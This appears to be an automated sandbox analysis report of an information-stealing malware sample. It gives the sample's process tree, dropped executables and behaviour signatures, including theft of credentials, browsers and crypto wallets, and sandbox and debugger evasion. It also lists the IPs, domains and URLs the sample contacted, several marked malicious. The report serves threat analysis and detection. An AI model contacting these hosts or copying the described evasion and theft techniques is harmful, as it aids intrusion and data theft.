Source: Yara match File source: 0000000A.00000002.2689206036.0000000000F31000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 86526d7b20.exe PID: 3428, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561305 Sample: file.exe Startdate: 23/11/2024 Architecture: WINDOWS Score: 100 88 youtube.com 2->88 90 youtube-ui.l.google.com 2->90 92 36 other IPs or domains 2->92 128 Multi AV Scanner detection for domain / URL 2->128 130 Suricata IDS alerts for network traffic 2->130 132 Found malware configuration 2->132 134 18 other signatures 2->134 9 skotes.exe 4 29 2->9         started        14 file.exe 5 2->14         started        16 2235d4f703.exe 2->16         started        18 7 other processes 2->18 signatures3 process4 dnsIp5 112 185.215.113.43, 49748, 49754, 49785 WHOLESALECONNECTIONSNL Portugal 9->112 114 185.215.113.16, 49790, 80 WHOLESALECONNECTIONSNL Portugal 9->114 116 31.41.244.11, 49760, 80 AEROEXPRESS-ASRU Russian Federation 9->116 76 C:\Users\user\AppData\...\d0d78d3fdb.exe, PE32 9->76 dropped 78 C:\Users\user\AppData\...\9afe8d29fa.exe, PE32 9->78 dropped 80 C:\Users\user\AppData\...\86526d7b20.exe, PE32 9->80 dropped 86 7 other malicious files 9->86 dropped 162 Creates multiple autostart registry keys 9->162 164 Hides threads from debuggers 9->164 166 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->166 20 d0d78d3fdb.exe 9->20         started        23 2235d4f703.exe 12 9->23         started        26 86526d7b20.exe 9->26         started        34 2 other processes 9->34 82 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->82 dropped 84 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->84 dropped 168 Detected unpacking (changes PE section rights) 14->168 170 Tries to evade debugger and weak emulator (self modifying code) 14->170 172 Tries to detect virtualization through RDTSC time measurements 14->172 28 skotes.exe 14->28         started        118 push.services.mozilla.com 16->118 174 Query firmware table information (likely to detect VMs) 16->174 176 Tries to harvest and steal ftp login credentials 16->176 178 Tries to harvest and steal browser information (history, passwords, etc) 16->178 36 2 other processes 16->36 180 Excessive usage of taskkill to terminate processes 18->180 182 Tries to steal Crypto Currency Wallets 18->182 184 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->184 30 firefox.exe 18->30         started        32 taskkill.exe 18->32         started        38 10 other processes 18->38 file6 signatures7 process8 dnsIp9 136 Multi AV Scanner detection for dropped file 20->136 138 Detected unpacking (changes PE section rights) 20->138 140 Tries to detect sandboxes and other dynamic analysis tools (window names) 20->140 156 4 other signatures 20->156 94 property-imper.sbs 172.67.162.84 CLOUDFLARENETUS United States 23->94 142 Antivirus detection for dropped file 23->142 144 Query firmware table information (likely to detect VMs) 23->144 146 Machine Learning detection for dropped file 23->146 148 Tries to steal Crypto Currency Wallets 23->148 40 chrome.exe 23->40         started        43 chrome.exe 23->43         started        96 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 26->96 158 3 other signatures 26->158 160 2 other signatures 28->160 98 youtube.com 142.250.181.78 GOOGLEUS United States 30->98 100 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 GOOGLEUS United States 30->100 106 5 other IPs or domains 30->106 53 2 other processes 30->53 45 conhost.exe 32->45         started        102 fvtekk5pn.top 34.116.198.130, 49786, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 34->102 104 home.fvtekk5pn.top 34->104 150 Attempt to bypass Chrome Application-Bound Encryption 34->150 152 Binary is likely a compiled AutoIt script file 34->152 154 Excessive usage of taskkill to terminate processes 34->154 47 chrome.exe 34->47         started        49 taskkill.exe 34->49         started        55 5 other processes 34->55 51 chrome.exe 36->51         started        57 8 other processes 38->57 signatures10 process11 dnsIp12 108 192.168.2.4, 443, 49723, 49724 unknown unknown 40->108 59 chrome.exe 40->59         started        62 chrome.exe 43->62         started        110 239.255.255.250 unknown Reserved 47->110 64 chrome.exe 47->64         started        66 conhost.exe 49->66         started        68 conhost.exe 55->68         started        70 conhost.exe 55->70         started        72 conhost.exe 55->72         started        74 conhost.exe 55->74         started        process13 dnsIp14 120 s-part-0035.t-0009.t-msedge.net 13.107.246.63, 443, 49736, 49738 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 59->120 122 shed.dual-low.s-part-0035.t-0009.t-msedge.net 59->122 126 4 other IPs or domains 59->126 124 www.google.com 142.250.181.68 GOOGLEUS United States 64->124
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
13.107.246.63
 s-part-0035.t-0009.t-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
142.250.181.68
 www.google.com United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
172.67.162.84
 property-imper.sbs United States
13335 CLOUDFLARENETUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
142.250.181.78
 youtube.com United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false

Private

IP
192.168.2.4
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
home.fvtekk5pn.top 34.116.198.130 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
services.addons.mozilla.org 151.101.1.91 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
fvtekk5pn.top 34.116.198.130 true
contile.services.mozilla.com 34.117.188.166 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
www.google.com 142.250.181.68 true
normandy-cdn.services.mozilla.com 35.201.103.21 true
star-mini.c10r.facebook.com 157.240.195.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.129 true
property-imper.sbs 172.67.162.84 true
dyna.wikimedia.org 185.15.58.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
youtube.com 142.250.181.78 true
youtube-ui.l.google.com 172.217.21.46 true
reddit.map.fastly.net 151.101.65.140 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
js.monitor.azure.com unknown unknown
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
mdec.nelreports.net unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
normandy.cdn.mozilla.net unknown unknown
shavar.services.mozilla.com unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js false
      		high
      http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
        		high
        https://property-imper.sbs/api false
          		high